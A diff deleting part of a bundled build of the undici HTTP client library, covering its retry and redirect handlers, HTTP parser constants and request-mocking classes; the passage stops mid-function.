''}` - } - } - } - - try { - this.dispatch(this.opts, this) - } catch (err) { - this.handler.onError(err) - } - } - } -} - -module.exports = RetryHandler - - -/***/ }), - -/***/ 8861: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const RedirectHandler = __nccwpck_require__(2860) - -function createRedirectInterceptor ({ maxRedirections: defaultMaxRedirections }) { - return (dispatch) => { - return function Intercept (opts, handler) { - const { maxRedirections = defaultMaxRedirections } = opts - - if (!maxRedirections) { - return dispatch(opts, handler) - } - - const redirectHandler = new RedirectHandler(dispatch, maxRedirections, opts, handler) - opts = { ...opts, maxRedirections: 0 } // Stop sub dispatcher from also redirecting. - return dispatch(opts, redirectHandler) - } - } -} - -module.exports = createRedirectInterceptor - - -/***/ }), - -/***/ 953: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.SPECIAL_HEADERS = exports.HEADER_STATE = exports.MINOR = exports.MAJOR = exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS = exports.TOKEN = exports.STRICT_TOKEN = exports.HEX = exports.URL_CHAR = exports.STRICT_URL_CHAR = exports.USERINFO_CHARS = exports.MARK = exports.ALPHANUM = exports.NUM = exports.HEX_MAP = exports.NUM_MAP = exports.ALPHA = exports.FINISH = exports.H_METHOD_MAP = exports.METHOD_MAP = exports.METHODS_RTSP = exports.METHODS_ICE = exports.METHODS_HTTP = exports.METHODS = exports.LENIENT_FLAGS = exports.FLAGS = exports.TYPE = exports.ERROR = void 0; -const utils_1 = __nccwpck_require__(1891); -// C headers -var ERROR; -(function (ERROR) { - ERROR[ERROR["OK"] = 0] = "OK"; - ERROR[ERROR["INTERNAL"] = 1] = "INTERNAL"; - ERROR[ERROR["STRICT"] = 2] = "STRICT"; - ERROR[ERROR["LF_EXPECTED"] = 3] = "LF_EXPECTED"; - ERROR[ERROR["UNEXPECTED_CONTENT_LENGTH"] = 4] = "UNEXPECTED_CONTENT_LENGTH"; - 
ERROR[ERROR["CLOSED_CONNECTION"] = 5] = "CLOSED_CONNECTION"; - ERROR[ERROR["INVALID_METHOD"] = 6] = "INVALID_METHOD"; - ERROR[ERROR["INVALID_URL"] = 7] = "INVALID_URL"; - ERROR[ERROR["INVALID_CONSTANT"] = 8] = "INVALID_CONSTANT"; - ERROR[ERROR["INVALID_VERSION"] = 9] = "INVALID_VERSION"; - ERROR[ERROR["INVALID_HEADER_TOKEN"] = 10] = "INVALID_HEADER_TOKEN"; - ERROR[ERROR["INVALID_CONTENT_LENGTH"] = 11] = "INVALID_CONTENT_LENGTH"; - ERROR[ERROR["INVALID_CHUNK_SIZE"] = 12] = "INVALID_CHUNK_SIZE"; - ERROR[ERROR["INVALID_STATUS"] = 13] = "INVALID_STATUS"; - ERROR[ERROR["INVALID_EOF_STATE"] = 14] = "INVALID_EOF_STATE"; - ERROR[ERROR["INVALID_TRANSFER_ENCODING"] = 15] = "INVALID_TRANSFER_ENCODING"; - ERROR[ERROR["CB_MESSAGE_BEGIN"] = 16] = "CB_MESSAGE_BEGIN"; - ERROR[ERROR["CB_HEADERS_COMPLETE"] = 17] = "CB_HEADERS_COMPLETE"; - ERROR[ERROR["CB_MESSAGE_COMPLETE"] = 18] = "CB_MESSAGE_COMPLETE"; - ERROR[ERROR["CB_CHUNK_HEADER"] = 19] = "CB_CHUNK_HEADER"; - ERROR[ERROR["CB_CHUNK_COMPLETE"] = 20] = "CB_CHUNK_COMPLETE"; - ERROR[ERROR["PAUSED"] = 21] = "PAUSED"; - ERROR[ERROR["PAUSED_UPGRADE"] = 22] = "PAUSED_UPGRADE"; - ERROR[ERROR["PAUSED_H2_UPGRADE"] = 23] = "PAUSED_H2_UPGRADE"; - ERROR[ERROR["USER"] = 24] = "USER"; -})(ERROR = exports.ERROR || (exports.ERROR = {})); -var TYPE; -(function (TYPE) { - TYPE[TYPE["BOTH"] = 0] = "BOTH"; - TYPE[TYPE["REQUEST"] = 1] = "REQUEST"; - TYPE[TYPE["RESPONSE"] = 2] = "RESPONSE"; -})(TYPE = exports.TYPE || (exports.TYPE = {})); -var FLAGS; -(function (FLAGS) { - FLAGS[FLAGS["CONNECTION_KEEP_ALIVE"] = 1] = "CONNECTION_KEEP_ALIVE"; - FLAGS[FLAGS["CONNECTION_CLOSE"] = 2] = "CONNECTION_CLOSE"; - FLAGS[FLAGS["CONNECTION_UPGRADE"] = 4] = "CONNECTION_UPGRADE"; - FLAGS[FLAGS["CHUNKED"] = 8] = "CHUNKED"; - FLAGS[FLAGS["UPGRADE"] = 16] = "UPGRADE"; - FLAGS[FLAGS["CONTENT_LENGTH"] = 32] = "CONTENT_LENGTH"; - FLAGS[FLAGS["SKIPBODY"] = 64] = "SKIPBODY"; - FLAGS[FLAGS["TRAILING"] = 128] = "TRAILING"; - // 1 << 8 is unused - 
FLAGS[FLAGS["TRANSFER_ENCODING"] = 512] = "TRANSFER_ENCODING"; -})(FLAGS = exports.FLAGS || (exports.FLAGS = {})); -var LENIENT_FLAGS; -(function (LENIENT_FLAGS) { - LENIENT_FLAGS[LENIENT_FLAGS["HEADERS"] = 1] = "HEADERS"; - LENIENT_FLAGS[LENIENT_FLAGS["CHUNKED_LENGTH"] = 2] = "CHUNKED_LENGTH"; - LENIENT_FLAGS[LENIENT_FLAGS["KEEP_ALIVE"] = 4] = "KEEP_ALIVE"; -})(LENIENT_FLAGS = exports.LENIENT_FLAGS || (exports.LENIENT_FLAGS = {})); -var METHODS; -(function (METHODS) { - METHODS[METHODS["DELETE"] = 0] = "DELETE"; - METHODS[METHODS["GET"] = 1] = "GET"; - METHODS[METHODS["HEAD"] = 2] = "HEAD"; - METHODS[METHODS["POST"] = 3] = "POST"; - METHODS[METHODS["PUT"] = 4] = "PUT"; - /* pathological */ - METHODS[METHODS["CONNECT"] = 5] = "CONNECT"; - METHODS[METHODS["OPTIONS"] = 6] = "OPTIONS"; - METHODS[METHODS["TRACE"] = 7] = "TRACE"; - /* WebDAV */ - METHODS[METHODS["COPY"] = 8] = "COPY"; - METHODS[METHODS["LOCK"] = 9] = "LOCK"; - METHODS[METHODS["MKCOL"] = 10] = "MKCOL"; - METHODS[METHODS["MOVE"] = 11] = "MOVE"; - METHODS[METHODS["PROPFIND"] = 12] = "PROPFIND"; - METHODS[METHODS["PROPPATCH"] = 13] = "PROPPATCH"; - METHODS[METHODS["SEARCH"] = 14] = "SEARCH"; - METHODS[METHODS["UNLOCK"] = 15] = "UNLOCK"; - METHODS[METHODS["BIND"] = 16] = "BIND"; - METHODS[METHODS["REBIND"] = 17] = "REBIND"; - METHODS[METHODS["UNBIND"] = 18] = "UNBIND"; - METHODS[METHODS["ACL"] = 19] = "ACL"; - /* subversion */ - METHODS[METHODS["REPORT"] = 20] = "REPORT"; - METHODS[METHODS["MKACTIVITY"] = 21] = "MKACTIVITY"; - METHODS[METHODS["CHECKOUT"] = 22] = "CHECKOUT"; - METHODS[METHODS["MERGE"] = 23] = "MERGE"; - /* upnp */ - METHODS[METHODS["M-SEARCH"] = 24] = "M-SEARCH"; - METHODS[METHODS["NOTIFY"] = 25] = "NOTIFY"; - METHODS[METHODS["SUBSCRIBE"] = 26] = "SUBSCRIBE"; - METHODS[METHODS["UNSUBSCRIBE"] = 27] = "UNSUBSCRIBE"; - /* RFC-5789 */ - METHODS[METHODS["PATCH"] = 28] = "PATCH"; - METHODS[METHODS["PURGE"] = 29] = "PURGE"; - /* CalDAV */ - METHODS[METHODS["MKCALENDAR"] = 30] = "MKCALENDAR"; - /* 
RFC-2068, section 19.6.1.2 */ - METHODS[METHODS["LINK"] = 31] = "LINK"; - METHODS[METHODS["UNLINK"] = 32] = "UNLINK"; - /* icecast */ - METHODS[METHODS["SOURCE"] = 33] = "SOURCE"; - /* RFC-7540, section 11.6 */ - METHODS[METHODS["PRI"] = 34] = "PRI"; - /* RFC-2326 RTSP */ - METHODS[METHODS["DESCRIBE"] = 35] = "DESCRIBE"; - METHODS[METHODS["ANNOUNCE"] = 36] = "ANNOUNCE"; - METHODS[METHODS["SETUP"] = 37] = "SETUP"; - METHODS[METHODS["PLAY"] = 38] = "PLAY"; - METHODS[METHODS["PAUSE"] = 39] = "PAUSE"; - METHODS[METHODS["TEARDOWN"] = 40] = "TEARDOWN"; - METHODS[METHODS["GET_PARAMETER"] = 41] = "GET_PARAMETER"; - METHODS[METHODS["SET_PARAMETER"] = 42] = "SET_PARAMETER"; - METHODS[METHODS["REDIRECT"] = 43] = "REDIRECT"; - METHODS[METHODS["RECORD"] = 44] = "RECORD"; - /* RAOP */ - METHODS[METHODS["FLUSH"] = 45] = "FLUSH"; -})(METHODS = exports.METHODS || (exports.METHODS = {})); -exports.METHODS_HTTP = [ - METHODS.DELETE, - METHODS.GET, - METHODS.HEAD, - METHODS.POST, - METHODS.PUT, - METHODS.CONNECT, - METHODS.OPTIONS, - METHODS.TRACE, - METHODS.COPY, - METHODS.LOCK, - METHODS.MKCOL, - METHODS.MOVE, - METHODS.PROPFIND, - METHODS.PROPPATCH, - METHODS.SEARCH, - METHODS.UNLOCK, - METHODS.BIND, - METHODS.REBIND, - METHODS.UNBIND, - METHODS.ACL, - METHODS.REPORT, - METHODS.MKACTIVITY, - METHODS.CHECKOUT, - METHODS.MERGE, - METHODS['M-SEARCH'], - METHODS.NOTIFY, - METHODS.SUBSCRIBE, - METHODS.UNSUBSCRIBE, - METHODS.PATCH, - METHODS.PURGE, - METHODS.MKCALENDAR, - METHODS.LINK, - METHODS.UNLINK, - METHODS.PRI, - // TODO(indutny): should we allow it with HTTP? 
- METHODS.SOURCE, -]; -exports.METHODS_ICE = [ - METHODS.SOURCE, -]; -exports.METHODS_RTSP = [ - METHODS.OPTIONS, - METHODS.DESCRIBE, - METHODS.ANNOUNCE, - METHODS.SETUP, - METHODS.PLAY, - METHODS.PAUSE, - METHODS.TEARDOWN, - METHODS.GET_PARAMETER, - METHODS.SET_PARAMETER, - METHODS.REDIRECT, - METHODS.RECORD, - METHODS.FLUSH, - // For AirPlay - METHODS.GET, - METHODS.POST, -]; -exports.METHOD_MAP = utils_1.enumToMap(METHODS); -exports.H_METHOD_MAP = {}; -Object.keys(exports.METHOD_MAP).forEach((key) => { - if (/^H/.test(key)) { - exports.H_METHOD_MAP[key] = exports.METHOD_MAP[key]; - } -}); -var FINISH; -(function (FINISH) { - FINISH[FINISH["SAFE"] = 0] = "SAFE"; - FINISH[FINISH["SAFE_WITH_CB"] = 1] = "SAFE_WITH_CB"; - FINISH[FINISH["UNSAFE"] = 2] = "UNSAFE"; -})(FINISH = exports.FINISH || (exports.FINISH = {})); -exports.ALPHA = []; -for (let i = 'A'.charCodeAt(0); i <= 'Z'.charCodeAt(0); i++) { - // Upper case - exports.ALPHA.push(String.fromCharCode(i)); - // Lower case - exports.ALPHA.push(String.fromCharCode(i + 0x20)); -} -exports.NUM_MAP = { - 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, - 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, -}; -exports.HEX_MAP = { - 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, - 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, - A: 0XA, B: 0XB, C: 0XC, D: 0XD, E: 0XE, F: 0XF, - a: 0xa, b: 0xb, c: 0xc, d: 0xd, e: 0xe, f: 0xf, -}; -exports.NUM = [ - '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', -]; -exports.ALPHANUM = exports.ALPHA.concat(exports.NUM); -exports.MARK = ['-', '_', '.', '!', '~', '*', '\'', '(', ')']; -exports.USERINFO_CHARS = exports.ALPHANUM - .concat(exports.MARK) - .concat(['%', ';', ':', '&', '=', '+', '$', ',']); -// TODO(indutny): use RFC -exports.STRICT_URL_CHAR = [ - '!', '"', '$', '%', '&', '\'', - '(', ')', '*', '+', ',', '-', '.', '/', - ':', ';', '<', '=', '>', - '@', '[', '\\', ']', '^', '_', - '`', - '{', '|', '}', '~', -].concat(exports.ALPHANUM); -exports.URL_CHAR = exports.STRICT_URL_CHAR - .concat(['\t', '\f']); -// All characters with 0x80 bit set to 1 -for 
(let i = 0x80; i <= 0xff; i++) { - exports.URL_CHAR.push(i); -} -exports.HEX = exports.NUM.concat(['a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F']); -/* Tokens as defined by rfc 2616. Also lowercases them. - * token = 1* - * separators = "(" | ")" | "<" | ">" | "@" - * | "," | ";" | ":" | "\" | <"> - * | "/" | "[" | "]" | "?" | "=" - * | "{" | "}" | SP | HT - */ -exports.STRICT_TOKEN = [ - '!', '#', '$', '%', '&', '\'', - '*', '+', '-', '.', - '^', '_', '`', - '|', '~', -].concat(exports.ALPHANUM); -exports.TOKEN = exports.STRICT_TOKEN.concat([' ']); -/* - * Verify that a char is a valid visible (printable) US-ASCII - * character or %x80-FF - */ -exports.HEADER_CHARS = ['\t']; -for (let i = 32; i <= 255; i++) { - if (i !== 127) { - exports.HEADER_CHARS.push(i); - } -} -// ',' = \x44 -exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS.filter((c) => c !== 44); -exports.MAJOR = exports.NUM_MAP; -exports.MINOR = exports.MAJOR; -var HEADER_STATE; -(function (HEADER_STATE) { - HEADER_STATE[HEADER_STATE["GENERAL"] = 0] = "GENERAL"; - HEADER_STATE[HEADER_STATE["CONNECTION"] = 1] = "CONNECTION"; - HEADER_STATE[HEADER_STATE["CONTENT_LENGTH"] = 2] = "CONTENT_LENGTH"; - HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING"] = 3] = "TRANSFER_ENCODING"; - HEADER_STATE[HEADER_STATE["UPGRADE"] = 4] = "UPGRADE"; - HEADER_STATE[HEADER_STATE["CONNECTION_KEEP_ALIVE"] = 5] = "CONNECTION_KEEP_ALIVE"; - HEADER_STATE[HEADER_STATE["CONNECTION_CLOSE"] = 6] = "CONNECTION_CLOSE"; - HEADER_STATE[HEADER_STATE["CONNECTION_UPGRADE"] = 7] = "CONNECTION_UPGRADE"; - HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING_CHUNKED"] = 8] = "TRANSFER_ENCODING_CHUNKED"; -})(HEADER_STATE = exports.HEADER_STATE || (exports.HEADER_STATE = {})); -exports.SPECIAL_HEADERS = { - 'connection': HEADER_STATE.CONNECTION, - 'content-length': HEADER_STATE.CONTENT_LENGTH, - 'proxy-connection': HEADER_STATE.CONNECTION, - 'transfer-encoding': HEADER_STATE.TRANSFER_ENCODING, - 'upgrade': HEADER_STATE.UPGRADE, -}; -//# 
sourceMappingURL=constants.js.map - -/***/ }), - -/***/ 1145: -/***/ ((module) => { - -module.exports = '' - - -/***/ }), - -/***/ 5627: -/***/ ((module) => { - -module.exports = '' - - -/***/ }), - -/***/ 1891: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.enumToMap = void 0; -function enumToMap(obj) { - const res = {}; - Object.keys(obj).forEach((key) => { - const value = obj[key]; - if (typeof value === 'number') { - res[key] = value; - } - }); - return res; -} -exports.enumToMap = enumToMap; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 6771: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kClients } = __nccwpck_require__(2785) -const Agent = __nccwpck_require__(7890) -const { - kAgent, - kMockAgentSet, - kMockAgentGet, - kDispatches, - kIsMockActive, - kNetConnect, - kGetNetConnect, - kOptions, - kFactory -} = __nccwpck_require__(4347) -const MockClient = __nccwpck_require__(8687) -const MockPool = __nccwpck_require__(6193) -const { matchValue, buildMockOptions } = __nccwpck_require__(9323) -const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) -const Dispatcher = __nccwpck_require__(412) -const Pluralizer = __nccwpck_require__(8891) -const PendingInterceptorsFormatter = __nccwpck_require__(6823) - -class FakeWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value - } -} - -class MockAgent extends Dispatcher { - constructor (opts) { - super(opts) - - this[kNetConnect] = true - this[kIsMockActive] = true - - // Instantiate Agent and encapsulate - if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - const agent = opts && opts.agent ? 
opts.agent : new Agent(opts) - this[kAgent] = agent - - this[kClients] = agent[kClients] - this[kOptions] = buildMockOptions(opts) - } - - get (origin) { - let dispatcher = this[kMockAgentGet](origin) - - if (!dispatcher) { - dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - } - return dispatcher - } - - dispatch (opts, handler) { - // Call MockAgent.get to perform additional setup before dispatching as normal - this.get(opts.origin) - return this[kAgent].dispatch(opts, handler) - } - - async close () { - await this[kAgent].close() - this[kClients].clear() - } - - deactivate () { - this[kIsMockActive] = false - } - - activate () { - this[kIsMockActive] = true - } - - enableNetConnect (matcher) { - if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { - if (Array.isArray(this[kNetConnect])) { - this[kNetConnect].push(matcher) - } else { - this[kNetConnect] = [matcher] - } - } else if (typeof matcher === 'undefined') { - this[kNetConnect] = true - } else { - throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') - } - } - - disableNetConnect () { - this[kNetConnect] = false - } - - // This is required to bypass issues caused by using global symbols - see: - // https://github.com/nodejs/undici/issues/1447 - get isMockActive () { - return this[kIsMockActive] - } - - [kMockAgentSet] (origin, dispatcher) { - this[kClients].set(origin, new FakeWeakRef(dispatcher)) - } - - [kFactory] (origin) { - const mockOptions = Object.assign({ agent: this }, this[kOptions]) - return this[kOptions] && this[kOptions].connections === 1 - ? 
new MockClient(origin, mockOptions) - : new MockPool(origin, mockOptions) - } - - [kMockAgentGet] (origin) { - // First check if we can immediately find it - const ref = this[kClients].get(origin) - if (ref) { - return ref.deref() - } - - // If the origin is not a string create a dummy parent pool and return to user - if (typeof origin !== 'string') { - const dispatcher = this[kFactory]('http://localhost:9999') - this[kMockAgentSet](origin, dispatcher) - return dispatcher - } - - // If we match, create a pool and assign the same dispatches - for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { - const nonExplicitDispatcher = nonExplicitRef.deref() - if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { - const dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] - return dispatcher - } - } - } - - [kGetNetConnect] () { - return this[kNetConnect] - } - - pendingInterceptors () { - const mockAgentClients = this[kClients] - - return Array.from(mockAgentClients.entries()) - .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) - .filter(({ pending }) => pending) - } - - assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { - const pending = this.pendingInterceptors() - - if (pending.length === 0) { - return - } - - const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) - - throw new UndiciError(` -${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: - -${pendingInterceptorsFormatter.format(pending)} -`.trim()) - } -} - -module.exports = MockAgent - - -/***/ }), - -/***/ 8687: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Client = __nccwpck_require__(3598) -const { 
buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockClient provides an API that extends the Client to influence the mockDispatches. - */ -class MockClient extends Client { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. 
- */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockClient - - -/***/ }), - -/***/ 888: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { UndiciError } = __nccwpck_require__(8045) - -class MockNotMatchedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, MockNotMatchedError) - this.name = 'MockNotMatchedError' - this.message = message || 'The request does not match any registered mock dispatches' - this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' - } -} - -module.exports = { - MockNotMatchedError -} - - -/***/ }), - -/***/ 410: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kDispatchKey, - kDefaultHeaders, - kDefaultTrailers, - kContentLength, - kMockDispatch -} = __nccwpck_require__(4347) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { buildURL } = __nccwpck_require__(3983) - -/** - * Defines the scope API for an interceptor reply - */ -class MockScope { - constructor (mockDispatch) { - this[kMockDispatch] = mockDispatch - } - - /** - * Delay a reply by a set amount in ms. - */ - delay (waitInMs) { - if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { - throw new InvalidArgumentError('waitInMs must be a valid integer > 0') - } - - this[kMockDispatch].delay = waitInMs - return this - } - - /** - * For a defined reply, never mark as consumed. - */ - persist () { - this[kMockDispatch].persist = true - return this - } - - /** - * Allow one to define a reply for a set amount of matching requests. 
- */ - times (repeatTimes) { - if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { - throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') - } - - this[kMockDispatch].times = repeatTimes - return this - } -} - -/** - * Defines an interceptor for a Mock - */ -class MockInterceptor { - constructor (opts, mockDispatches) { - if (typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object') - } - if (typeof opts.path === 'undefined') { - throw new InvalidArgumentError('opts.path must be defined') - } - if (typeof opts.method === 'undefined') { - opts.method = 'GET' - } - // See https://github.com/nodejs/undici/issues/1245 - // As per RFC 3986, clients are not supposed to send URI - // fragments to servers when they retrieve a document, - if (typeof opts.path === 'string') { - if (opts.query) { - opts.path = buildURL(opts.path, opts.query) - } else { - // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 - const parsedURL = new URL(opts.path, 'data://') - opts.path = parsedURL.pathname + parsedURL.search - } - } - if (typeof opts.method === 'string') { - opts.method = opts.method.toUpperCase() - } - - this[kDispatchKey] = buildKey(opts) - this[kDispatches] = mockDispatches - this[kDefaultHeaders] = {} - this[kDefaultTrailers] = {} - this[kContentLength] = false - } - - createMockScopeDispatchData (statusCode, data, responseOptions = {}) { - const responseData = getResponseData(data) - const contentLength = this[kContentLength] ? 
{ 'content-length': responseData.length } : {} - const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } - const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } - - return { statusCode, data, headers, trailers } - } - - validateReplyParameters (statusCode, data, responseOptions) { - if (typeof statusCode === 'undefined') { - throw new InvalidArgumentError('statusCode must be defined') - } - if (typeof data === 'undefined') { - throw new InvalidArgumentError('data must be defined') - } - if (typeof responseOptions !== 'object') { - throw new InvalidArgumentError('responseOptions must be an object') - } - } - - /** - * Mock an undici request with a defined reply. - */ - reply (replyData) { - // Values of reply aren't available right now as they - // can only be available when the reply callback is invoked. - if (typeof replyData === 'function') { - // We'll first wrap the provided callback in another function, - // this function will properly resolve the data from the callback - // when invoked. - const wrappedDefaultsCallback = (opts) => { - // Our reply options callback contains the parameter for statusCode, data and options. - const resolvedData = replyData(opts) - - // Check if it is in the right format - if (typeof resolvedData !== 'object') { - throw new InvalidArgumentError('reply options callback must return an object') - } - - const { statusCode, data = '', responseOptions = {} } = resolvedData - this.validateReplyParameters(statusCode, data, responseOptions) - // Since the values can be obtained immediately we return them - // from this higher order function that will be resolved later. - return { - ...this.createMockScopeDispatchData(statusCode, data, responseOptions) - } - } - - // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. 
- const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) - return new MockScope(newMockDispatch) - } - - // We can have either one or three parameters, if we get here, - // we should have 1-3 parameters. So we spread the arguments of - // this function to obtain the parameters, since replyData will always - // just be the statusCode. - const [statusCode, data = '', responseOptions = {}] = [...arguments] - this.validateReplyParameters(statusCode, data, responseOptions) - - // Send in-already provided data like usual - const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) - return new MockScope(newMockDispatch) - } - - /** - * Mock an undici request with a defined error. - */ - replyWithError (error) { - if (typeof error === 'undefined') { - throw new InvalidArgumentError('error must be defined') - } - - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) - return new MockScope(newMockDispatch) - } - - /** - * Set default reply headers on the interceptor for subsequent replies - */ - defaultReplyHeaders (headers) { - if (typeof headers === 'undefined') { - throw new InvalidArgumentError('headers must be defined') - } - - this[kDefaultHeaders] = headers - return this - } - - /** - * Set default reply trailers on the interceptor for subsequent replies - */ - defaultReplyTrailers (trailers) { - if (typeof trailers === 'undefined') { - throw new InvalidArgumentError('trailers must be defined') - } - - this[kDefaultTrailers] = trailers - return this - } - - /** - * Set reply content length header for replies on the interceptor - */ - replyContentLength () { - this[kContentLength] = true - return this - } -} - -module.exports.MockInterceptor = MockInterceptor -module.exports.MockScope = MockScope - - -/***/ }), - -/***/ 6193: -/***/ ((module, 
__unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Pool = __nccwpck_require__(4634) -const { buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockPool provides an API that extends the Pool to influence the mockDispatches. - */ -class MockPool extends Pool { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. 
- */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockPool - - -/***/ }), - -/***/ 4347: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kAgent: Symbol('agent'), - kOptions: Symbol('options'), - kFactory: Symbol('factory'), - kDispatches: Symbol('dispatches'), - kDispatchKey: Symbol('dispatch key'), - kDefaultHeaders: Symbol('default headers'), - kDefaultTrailers: Symbol('default trailers'), - kContentLength: Symbol('content length'), - kMockAgent: Symbol('mock agent'), - kMockAgentSet: Symbol('mock agent set'), - kMockAgentGet: Symbol('mock agent get'), - kMockDispatch: Symbol('mock dispatch'), - kClose: Symbol('close'), - kOriginalClose: Symbol('original agent close'), - kOrigin: Symbol('origin'), - kIsMockActive: Symbol('is mock active'), - kNetConnect: Symbol('net connect'), - kGetNetConnect: Symbol('get net connect'), - kConnected: Symbol('connected') -} - - -/***/ }), - -/***/ 9323: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MockNotMatchedError } = __nccwpck_require__(888) -const { - kDispatches, - kMockAgent, - kOriginalDispatch, - kOrigin, - kGetNetConnect -} = __nccwpck_require__(4347) -const { buildURL, nop } = __nccwpck_require__(3983) -const { STATUS_CODES } = __nccwpck_require__(3685) -const { - types: { - isPromise - } -} = __nccwpck_require__(3837) - -function matchValue (match, value) { - if (typeof match === 'string') { - return match === value - } - if (match instanceof RegExp) { - return match.test(value) - } - if (typeof match === 'function') { - return match(value) === true - } - return false -} - -function lowerCaseEntries (headers) { - return Object.fromEntries( - Object.entries(headers).map(([headerName, headerValue]) => { - return [headerName.toLocaleLowerCase(), 
